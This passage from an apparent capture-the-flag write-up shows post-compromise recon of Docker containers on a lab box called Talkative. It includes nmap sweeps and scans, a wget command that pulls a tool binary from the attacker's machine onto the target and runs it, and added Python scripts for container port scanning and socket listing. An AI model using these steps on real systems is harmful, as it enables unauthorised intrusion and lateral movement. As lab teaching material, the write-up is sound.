Docker
During the process enumeration phase, I found out that there are a lot of Docker containers running in the background.
saul@talkative:/dev/shm$ docker ps -a
got permission denied while trying to connect to the docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/json?all=1": dial unix /var/run/docker.sock: connect: permission denied
The saul user cannot enumerate the containers: talking to the daemon requires read/write access to /var/run/docker.sock, which is normally restricted to root and the docker group.
saul@talkative:/dev/shm$ ll /opt
total 12
drwxr-xr-x 3 root root 4096 Aug 10 2021 ./
drwxr-xr-x 19 root root 4096 Mar 15 2022 ../
drwx--x--x 4 root root 4096 Aug 10 2021 containerd/
saul@talkative:/dev/shm$ ll /opt/containerd
ls: cannot open directory '/opt/containerd': Permission denied
There is a containerd directory under /opt, but its permissions (drwx--x--x, owned by root) do not allow listing it.
saul@talkative:/dev/shm$ ifconfig | grep -w inet
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet 10.10.11.155 netmask 255.255.254.0 broadcast 10.10.11.255
inet 127.0.0.1 netmask 255.0.0.0
The two extra interfaces suggest two Docker bridge networks: 172.17.0.0/16 and 172.18.0.0/16.
Finding every container would mean scanning both networks manually, and sweeping two /16 ranges takes a very long time.
Of the three web services, two have already been identified and exploited: jamovi at 172.17.0.13 and Bolt CMS at 172.18.0.2. Only the Rocket.Chat instance has not been located, and it could be anywhere within those two subnets.
saul@talkative:/dev/shm$ wget -q http://10.10.14.9/nmap ; chmod 755 /dev/shm/nmap
Nmap is not installed on the box, so I transferred a standalone Nmap binary from my attacking machine first.
saul@talkative:/dev/shm$ ./nmap -sn 172.17.0.0/16
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-06-08 18:51 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.1
Host is up (0.0019s latency).
Nmap scan report for 172.17.0.2
Host is up (0.00083s latency).
Nmap scan report for 172.17.0.3
Host is up (0.00075s latency).
Nmap scan report for 172.17.0.4
Host is up (0.00071s latency).
Nmap scan report for 172.17.0.5
Host is up (0.00058s latency).
Nmap scan report for 172.17.0.6
Host is up (0.00047s latency).
Nmap scan report for 172.17.0.7
Host is up (0.00041s latency).
Nmap scan report for 172.17.0.8
Host is up (0.00036s latency).
Nmap scan report for 172.17.0.9
Host is up (0.00030s latency).
Nmap scan report for 172.17.0.10
Host is up (0.00025s latency).
Nmap scan report for 172.17.0.11
Host is up (0.00024s latency).
Nmap scan report for 172.17.0.12
Host is up (0.00053s latency).
Nmap scan report for 172.17.0.13
Host is up (0.0011s latency).
Nmap scan report for 172.17.0.14
Host is up (0.0010s latency).
Nmap scan report for 172.17.0.15
Host is up (0.00080s latency).
Nmap scan report for 172.17.0.16
Host is up (0.00071s latency).
Nmap scan report for 172.17.0.17
Host is up (0.00064s latency).
Nmap scan report for 172.17.0.18
Host is up (0.00058s latency).
Nmap scan report for 172.17.0.19
Host is up (0.00068s latency).
[...REDACTED...]
This ping sweep was extremely inefficient: covering a whole /16 means probing 65,534 addresses, almost all of them unused, and it took a very long time. What the sweep did confirm is summarised below.
- The hosts in the range 172.17.0.4-19 were already discovered earlier: their port 80 was mapped to the individual host ports 6000-6015.
- 172.17.0.1 is the target host itself (the host's own address on the Docker bridge).
- 172.17.0.3:3000 was mapped to 127.0.0.1:3000. Rocket.Chat is accessible through port 3000, so this is possibly the Rocket.Chat instance, although it is a bit strange to see it mapped to the loopback address instead of something like 0.0.0.0:3000.
- 172.17.0.2 has never been checked. I will start here.
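Rather than ping-sweeping the whole /16, the port map above can be rebuilt from the host's own docker-proxy command lines (every published port runs one such process), and a connect scan can be pointed at the handful of addresses Docker actually hands out. The following script is an added example and not code from the original writeup: the ps lines embedded in it are constructed to mirror the mappings described on this page, the candidate-address heuristic assumes Docker's default IPAM (lowest free address after the .1 gateway), and the loopback listener exists only so the scanner has something to find when run offline.

```python
"""Added example: map docker-proxy processes to containers, then probe
only likely container addresses instead of sweeping a /16."""
import ipaddress
import itertools
import re
import socket
from concurrent.futures import ThreadPoolExecutor

# Constructed sample of `ps -auxwww | grep docker-proxy` output (not real host data).
SAMPLE_PS = """\
root 1481 0.0 0.0 1223984 588 ? Sl 11:24 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3000 -container-ip 172.17.0.3 -container-port 3000
root 1502 0.0 0.0 1223984 588 ? Sl 11:24 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 6000 -container-ip 172.17.0.4 -container-port 80
root 1523 0.0 0.0 1223984 588 ? Sl 11:24 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 6001 -container-ip 172.17.0.5 -container-port 80
"""

PROXY_RE = re.compile(
    r"docker-proxy -proto (?P<proto>\w+) -host-ip (?P<hip>\S+) -host-port (?P<hport>\d+)"
    r" -container-ip (?P<cip>\S+) -container-port (?P<cport>\d+)"
)


def parse_docker_proxy(ps_output):
    """Return [(host_ip, host_port, container_ip, container_port), ...]
    for every docker-proxy process found in ps output."""
    rows = []
    for line in ps_output.splitlines():
        m = PROXY_RE.search(line)
        if m:
            rows.append((m["hip"], int(m["hport"]), m["cip"], int(m["cport"])))
    return rows


def bridge_candidates(cidr, limit=32):
    """First `limit` usable addresses after the gateway (.1). Assumption: the
    default Docker IPAM allocates the lowest free address, so containers
    cluster at the bottom of the subnet."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(h) for h in itertools.islice(net.hosts(), 1, limit + 1)]


def tcp_probe(host, port, timeout=0.3):
    """True if a TCP connect to host:port succeeds within `timeout` seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def tcp_scan(hosts, ports, timeout=0.3, workers=64):
    """Parallel connect scan; returns sorted [(host, port), ...] that are open."""
    targets = [(h, p) for h in hosts for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as ex:
        results = list(ex.map(lambda t: (t, tcp_probe(*t, timeout=timeout)), targets))
    return sorted(t for t, is_open in results if is_open)


def open_local_listener():
    """Demo harness only: a loopback listener on a free port, so the scanner
    has a known-open target when run offline. Returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    for hip, hport, cip, cport in parse_docker_proxy(SAMPLE_PS):
        print(f"host {hip}:{hport} -> container {cip}:{cport}")
    # On the real box you would scan bridge_candidates("172.17.0.0/16")
    # against a short list such as [80, 3000, 27017]; here we hit a local listener.
    srv, port = open_local_listener()
    print("open:", tcp_scan(["127.0.0.1"], [port]))
    srv.close()
```

On a box without Nmap this runs with the system Python alone. The candidate list is a heuristic: containers that were started and stopped leave gaps, and user-defined networks or static addresses break the assumption, so widen `limit` or fall back to the full range if nothing turns up.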
172.17.0.2
saul@talkative:/dev/shm$ ./nmap -p- 172.17.0.2
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-06-08 19:43 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.2
Host is up (0.000069s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
27017/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds
The scan shows that 172.17.0.2 has only port 27017 open, the default MongoDB port. MongoDB also showed up earlier in the pspy output, so this container is probably just the backend database.
172.17.0.3
saul@talkative:/dev/shm$ ./nmap -p- 172.17.0.3
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-06-08 19:50 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.3
Host is up (0.000075s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
3000/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
The scan result matches the initial recon: only port 3000 is open.
saul@talkative:/dev/shm$ curl -s http://172.17.0.3:3000 | grep -i rocket
<title>Talkative's Rocket Chat</title><meta name="application-name" content="Talkative's Rocket Chat"><meta name="apple-mobile-web-app-title" content="Talkative's Rocket Chat">
The container at 172.17.0.3 is confirmed to be the Rocket.Chat instance.
saul@talkative:/dev/shm$ ps -auxwww | grep -i 3000
root 1481 0.0 0.0 1223984 588 ? Sl 11:24 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3000 -container-ip 172.17.0.3 -container-port 3000
saul@talkative:/dev/shm$ netstat -antup4 | grep -i 3000
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
In the netstat output, 127.0.0.1:3000 is the local address the socket is bound to and 0.0.0.0:* is the foreign-address column, which for a LISTEN socket simply means "any peer". So docker-proxy is listening on loopback only, exactly as its -host-ip 127.0.0.1 argument says. This line on its own therefore does not explain how port 3000 was reachable from the public side: Docker publishes ports primarily through DNAT rules in the iptables nat table, and listing those requires root, which I do not have here.
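Because netstat hides the process details of sockets owned by other users, a quicker way to check what an unprivileged foothold can still see is to decode /proc/net/tcp directly, which is world-readable. The script below is an added example, not code from the original writeup: it parses the hex-encoded local address of every socket and reports which listeners are bound to loopback and which to all interfaces, so the confusion above (local column versus foreign column) cannot arise. The embedded /proc/net/tcp lines are constructed for the demo; the function also accepts the real file when run on a Linux host.

```python
"""Added example: list listening sockets and their bind scope from
/proc/net/tcp without needing root."""
import os
import socket
import struct

# Constructed sample in /proc/net/tcp format: a loopback-only listener on 3000,
# an all-interfaces listener on 80, and one established connection to 3000.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0BB8 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 31337 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 31338 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0BB8 0100007F:B1E2 01 00000000:00000000 00:00000000 00000000     0        0 31339 1 0000000000000000 20 4 30 10 -1
"""

TCP_LISTEN = 0x0A  # socket state code used by the kernel for LISTEN


def decode_addr(hexaddr):
    """'0100007F:0BB8' -> ('127.0.0.1', 3000). The IPv4 half is a little-endian
    32-bit integer in hex, the port half is big-endian hex."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def scope_of(ip):
    """Human-readable bind scope for a listener's local address."""
    if ip == "0.0.0.0":
        return "all interfaces"
    if ip.startswith("127."):
        return "loopback only"
    return "single interface"


def parse_listeners(proc_net_tcp):
    """Return [(ip, port, scope), ...] for every LISTEN socket in the text."""
    listeners = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip header row
        fields = line.split()
        if len(fields) < 4:
            continue
        local, state = fields[1], int(fields[3], 16)
        if state != TCP_LISTEN:
            continue
        ip, port = decode_addr(local)
        listeners.append((ip, port, scope_of(ip)))
    return listeners


def listeners_from_proc(path="/proc/net/tcp"):
    """Read the live table on Linux; fall back to the constructed sample elsewhere."""
    if os.path.exists(path):
        with open(path) as fh:
            return parse_listeners(fh.read())
    return parse_listeners(SAMPLE_PROC_NET_TCP)


if __name__ == "__main__":
    for ip, port, scope in listeners_from_proc():
        print(f"{ip}:{port:<6} {scope}")
```

A listener reported as "loopback only" can be reached from the host (and from anything that can reach the host's loopback, such as a port-forward over SSH), but not from the outside through that socket; if the port is nevertheless open externally, the explanation lies in the nat table, not in this listing.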